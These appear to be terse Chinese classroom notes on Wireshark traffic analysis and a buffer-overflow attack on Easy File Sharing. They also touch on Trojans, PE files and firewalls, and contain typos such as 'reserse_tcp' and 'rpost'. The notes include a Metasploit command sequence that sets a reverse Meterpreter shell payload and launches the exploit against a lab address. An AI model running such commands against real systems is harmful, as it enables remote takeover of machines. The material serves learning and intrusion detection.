追踪流

tcp流

http流

请求方法：

get

host

User-Agent

URI

GET请求获取由Request-URI

http.request.method == "GET"

发现登录敏感信息

http.request.method == "POST"

msf

metasploit

msf5> search EasyfileSharing

msf5> use exploit/windows/http/easyfilesharing

set payload windows/meterpreter/reserse_tcp

缓冲区大小

IDA

复制出来copy

入侵请求特征：

1、get

2、4061bit

3、结束位

Wireshark的查找功能

使用正则表达式

服务器感染木马，去连接客户端

正向木马和反向木马

冰河

灰鸽子

PE文件，可移植可执行的文件

exe,sys,ini,

metasploit

metaspoit

search EasyfileSharing

msf5>use exploit/

show options

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.223.233

set rhost 192.168.223.137

set rpost 80

exploit

trunctated 截断

构造数据包（填充）

未做输入做验证

指标---木马文件

IDA

反编译

GET

get请求

C语言越界

前面填充，后面越界

4061字节

GET请求

HTTP/1.1

wireshark有查找功能

逐个查找

缓冲区溢出攻击

服务器访问客户端----syn

服务器发起syn

PE文件，program execute

防火墙规则

黑客的端口映射技术